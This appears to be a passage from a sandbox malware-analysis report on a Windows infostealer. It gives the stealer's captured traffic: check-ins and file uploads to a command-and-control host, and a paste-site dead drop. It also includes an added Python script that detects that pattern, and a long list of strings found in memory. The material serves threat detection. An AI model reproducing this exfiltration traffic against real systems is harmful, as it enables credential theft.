Source: global traffic; HTTP traffic detected: GET /feouewe5/raw HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Host: rentry.co
Source: global traffic; DNS traffic detected: DNS query: traveladdicts.top
Source: global traffic; DNS traffic detected: DNS query: 18.31.95.13.in-addr.arpa
Source: global traffic; DNS traffic detected: DNS query: rentry.co
Source: unknown; HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: traveladdicts.top
Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 28 Jan 2025 15:13:37 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | vary: Origin | vary: accept-encoding | x-xss-protection: 1; mode=block | strict-transport-security: max-age=31536000; includeSubDomains | cf-cache-status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fkXRJB%2Fs5vP1oGBpiFUPhRCJACrVgngHqPy%2Fy2l4j%2BiHMN%2BGcBdR8pXbOs%2BsxnutU6KoAPk7dNiEY8SR6vrwDz%2BGyr6LG8X1EsjXzz%2BQ6c%2B%2BbnH0q8IZF8IYDw%3D%3D"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | Server: cloudflare | CF-RAY: 9091ed731f6d0cbc-EWR | server-timing: cfL4;desc="?proto=TCP&rtt=1671&min_rtt=1669&rtt_var=630&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2818&recv_bytes=810&delivery_rate=1731909&cwnd=184&unsent_bytes=0&cid=7e756fa19c397caa&ts=268&x=0"
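The HTTP lines above are the whole C2 conversation: two tiny form-urlencoded POSTs to /api on traveladdicts.top, five multipart uploads to the same path (the largest 574644 bytes), a closing small POST, and a GET of a rentry.co "raw" paste, which is the usual dead-drop-resolver shape. The script below is an added example, not part of the Joe Sandbox report: it rebuilds those request heads from the header fields the report lists (bodies were not captured, so only their sizes are known), parses them the way a proxy-log reviewer would, and applies three checks: small form POST plus multipart uploads to a single path, a browser User-Agent sent without the Accept/Accept-Language/Referer headers a real browser always adds, and a GET of a paste-site raw URL. PASTE_HOSTS, BROWSER_HEADERS and the SMALL_BODY threshold are this example's assumptions.

```python
"""Rebuild the HTTP session in this report from request heads and flag it.

Added example; not part of the Joe Sandbox report. SAMPLE_HEADS is
constructed from the report's "HTTP traffic detected" lines in capture order.
"""
from collections import defaultdict

UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
      "(KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36")

PASTE_HOSTS = {"rentry.co", "pastebin.com", "paste.ee"}   # assumed short list
BROWSER_HEADERS = ("accept", "accept-language", "accept-encoding", "referer")
SMALL_BODY = 128   # bytes; the check-in bodies in this report are 8, 49 and 84


def build_head(method, path, host, content_type=None, length=None):
    """Assemble a request head with exactly the headers the report shows (no Accept*)."""
    lines = [f"{method} {path} HTTP/1.1", "Connection: Keep-Alive"]
    if content_type:
        lines.append(f"Content-Type: {content_type}")
    lines.append(f"User-Agent: {UA}")
    if length is not None:
        lines.append(f"Content-Length: {length}")
    lines.append(f"Host: {host}")
    return "\r\n".join(lines) + "\r\n\r\n"


SAMPLE_HEADS = [
    build_head("POST", "/api", "traveladdicts.top", "application/x-www-form-urlencoded", 8),
    build_head("POST", "/api", "traveladdicts.top", "application/x-www-form-urlencoded", 49),
    build_head("POST", "/api", "traveladdicts.top", "multipart/form-data; boundary=4R91O26XP53ONV79", 12835),
    build_head("POST", "/api", "traveladdicts.top", "multipart/form-data; boundary=6TPX6EWWU8QLG", 15035),
    build_head("POST", "/api", "traveladdicts.top", "multipart/form-data; boundary=ENY5G9P6AN86O47W", 20569),
    build_head("POST", "/api", "traveladdicts.top", "multipart/form-data; boundary=UDD2YJGU6IP3ESK79Y4", 2656),
    build_head("POST", "/api", "traveladdicts.top", "multipart/form-data; boundary=FCR2CY7USXN11D4G", 574644),
    build_head("POST", "/api", "traveladdicts.top", "application/x-www-form-urlencoded", 84),
    build_head("GET", "/feouewe5/raw", "rentry.co"),
]


def parse_head(raw):
    """Parse a request head into (method, path, lower-cased header dict)."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers


def analyze_session(raw_heads):
    """Group requests per host; return counters and the flags that fire for each."""
    hosts = defaultdict(lambda: {"small_form_posts": 0, "multipart_posts": 0,
                                 "upload_bytes": 0, "paths": set(), "flags": set()})
    for raw in raw_heads:
        method, path, h = parse_head(raw)
        rec = hosts[h.get("host", "?")]
        rec["paths"].add((method, path))
        ctype = h.get("content-type", "").lower()
        length = int(h.get("content-length", "0"))
        if method == "POST" and ctype.startswith("application/x-www-form-urlencoded") and length <= SMALL_BODY:
            rec["small_form_posts"] += 1          # check-in / task request
        if method == "POST" and ctype.startswith("multipart/form-data"):
            rec["multipart_posts"] += 1           # file upload
            rec["upload_bytes"] += length
        if "mozilla/" in h.get("user-agent", "").lower() and not any(k in h for k in BROWSER_HEADERS):
            rec["flags"].add("browser-ua-without-browser-headers")
        if method == "GET" and h.get("host") in PASTE_HOSTS and path.endswith("/raw"):
            rec["flags"].add("paste-site-raw-fetch")
    for rec in hosts.values():
        post_paths = {p for m, p in rec["paths"] if m == "POST"}
        if rec["small_form_posts"] and rec["multipart_posts"] and len(post_paths) == 1:
            rec["flags"].add("stealer-exfil-pattern")
        rec["flags"] = sorted(rec["flags"])
        rec["paths"] = sorted(rec["paths"])
    return dict(hosts)


if __name__ == "__main__":
    for host, rec in analyze_session(SAMPLE_HEADS).items():
        print(host, rec["small_form_posts"], rec["multipart_posts"], rec["upload_bytes"], rec["flags"])
```

Over this capture the traveladdicts.top record totals 625739 bytes of multipart uploads after three check-in sized POSTs, which is the exfiltration the Suricata rule 2048094 also fired on. The only 404 in the capture (15:13:37 GMT) lines up with the rentry.co connection at 16:13:37 +0100, so the paste appears to have been gone by analysis time; a missing dead drop does not stop the stealer, which had already exfiltrated to its configured C2.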
Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1888845598.000000000369B000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1888845598.000000000369B000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe; String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1628839473.0000000000832000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2257624575.0000000003094000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: powershell.exe, 00000007.00000002.2257624575.0000000003094000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.micro
Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1628839473.000000000085C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.microXO
Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1888845598.000000000369B000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe; String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe; String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe; String found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z
Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe; String found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0
Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1888845598.000000000369B000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1888845598.000000000369B000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1888845598.000000000369B000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1888845598.000000000369B000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe; String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe; String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe; String found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#
Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe; String found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#
Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe; String found in binary or memory: http://ocsp.comodoca.com0
Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1888845598.000000000369B000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://ocsp.digicert.com0
Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1888845598.000000000369B000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe; String found in binary or memory: http://ocsp.sectigo.com0
Source: powershell.exe, 00000007.00000002.2258828661.0000000004D61000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000007.00000002.2257624575.0000000003094000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://www.microsoft.co
Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe; String found in binary or memory: http://www.testlab2008.com/indices/submit.php?c=CD&i=
Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1888845598.000000000369B000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://x1.c.lencr.org/0
Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1888845598.000000000369B000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://x1.i.lencr.org/0
Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1631266942.0000000003618000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1631164449.000000000361B000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1631390635.000000000361A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000007.00000002.2258828661.0000000004D61000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://aka.ms/pscore6lB
Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1890442481.000000000367A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696495411400900000.2&ci=1696495411208.
Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1907799374.0000000003679000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1907000807.000000000366E000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1907385996.0000000003679000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696495411400900000.1&ci=1696495411208.12791&cta
Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1631266942.0000000003618000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1631164449.000000000361B000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1631390635.000000000361A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1631266942.0000000003618000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1631164449.000000000361B000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1631390635.000000000361A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1631266942.0000000003618000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1631164449.000000000361B000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1631390635.000000000361A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1890442481.000000000367A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1907799374.0000000003679000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1907000807.000000000366E000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1907385996.0000000003679000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1631266942.0000000003618000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1631164449.000000000361B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1631266942.0000000003618000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1631164449.000000000361B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1631266942.0000000003618000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1631164449.000000000361B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1907799374.0000000003679000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1890442481.000000000367A000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1907000807.000000000366E000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1907385996.0000000003679000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqd4plX4pbW1CbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.2253914618.0000000003661000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.2252940545.0000000000872000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000002.2256477161.0000000000888000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.2245994632.0000000000886000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.2246120073.0000000000872000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2258828661.000000000508C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2258828661.0000000004EBA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2258828661.0000000005092000.00000004.00000800.00020000.00000000.sdmp, KOZ4VON644XMYEN5.ps1.0.drString found in binary or memory: https://rentry.co/
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.2246120073.00000000007F1000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000002.2255396657.00000000007FA000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.2246120073.000000000085C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rentry.co/feouewe5/raw
              Source: powershell.exe, 00000007.00000002.2258828661.00000000050C3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2258828661.0000000005092000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rentry.co/hZ
              Source: powershell.exe, 00000007.00000002.2258828661.000000000508C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rentry.co/static/icons/270.pnLR
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.2253914618.0000000003661000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.2252940545.0000000000872000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.2246120073.0000000000872000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2258828661.000000000508C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2258828661.0000000004EBA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2258828661.0000000005092000.00000004.00000800.00020000.00000000.sdmp, KOZ4VON644XMYEN5.ps1.0.drString found in binary or memory: https://rentry.co/static/icons/270.png
              Source: powershell.exe, 00000007.00000002.2258828661.00000000050C3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2258828661.0000000005092000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rentry.co/static/icons/270.pnghZ
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.2253914618.0000000003661000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.2252940545.0000000000872000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.2246120073.0000000000872000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2258828661.000000000508C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2258828661.0000000004EBA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2258828661.0000000005092000.00000004.00000800.00020000.00000000.sdmp, KOZ4VON644XMYEN5.ps1.0.drString found in binary or memory: https://rentry.co/static/icons/512.png
              Source: powershell.exe, 00000007.00000002.2258828661.00000000050C3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2258828661.0000000005092000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rentry.co/static/icons/512.pnghZ
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeString found in binary or memory: https://sectigo.com/CPS0
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1890121159.0000000003907000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1890121159.0000000003907000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.2246120073.000000000081F000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.2225011826.0000000000897000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.2085160314.0000000000897000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.2098375741.0000000000897000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1907385996.000000000367B000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.2080065178.000000000089C000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.2245994632.0000000000892000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1628839473.0000000000832000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1628839473.000000000081C000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1908671086.000000000081D000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.2080065178.0000000000897000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.2083156314.000000000083C000.00000004.00000020.00020000.00000000.sdmp, 
#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.2083156314.000000000081F000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1907000807.000000000367B000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1908607385.0000000000897000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1907875064.000000000365F000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000002.2255853718.0000000000820000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1907535156.000000000365D000.00000004.00000800.00020000.00000000.sdmp, 